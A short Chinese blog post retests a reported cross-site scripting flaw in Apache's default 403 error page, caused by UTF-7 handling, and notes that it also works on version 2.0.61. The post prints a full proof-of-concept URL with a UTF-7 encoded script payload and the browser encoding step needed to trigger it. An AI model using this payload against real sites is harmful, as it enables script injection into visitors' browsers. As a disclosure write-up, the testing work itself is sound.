Apache HTTP 服务器 403 Error 页面跨站脚本漏洞

最近闹地震,上个网都不安心,只有在网上瞎逛,到绿盟看看漏洞公告,绿盟昨日公布一个 Apache HTTP 服务器 403 Error 页面跨站脚本漏洞。

漏洞公告链接:

漏洞所产生的原因是如果使用 Apache Server 默认的 Forbidden 403 错误页面,那么可以产生跨站漏洞,我按测试方法测试并未成功。绿盟并没有太详细描述,经过在国外安全站搜寻,得知 Forbidden 403 页面在处理 UTF-7 字符上而产生的 XSS。

漏洞公告所述,出现在 Apache Group Apache 2.2.* 和 Apache Group Apache 1.3.* 两个版本上,但我在 2.0.61 版本上依然测试成功。

安装 Apache v2.2.8 后提交以下 URL:

http://localhost/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthep
WhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdaz
OG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1S
QPhU5VReCz1olPh5jZDEFACED<!xc+ADw-script+AD4-alert('www.hoversnow.com.cn')
+ADw-/script+AD4---//--

由于是在处理 UTF-7 字符上产生漏洞,需要点击鼠标右键,把编码中的自动选择勾上,然后 XSS 测试成功。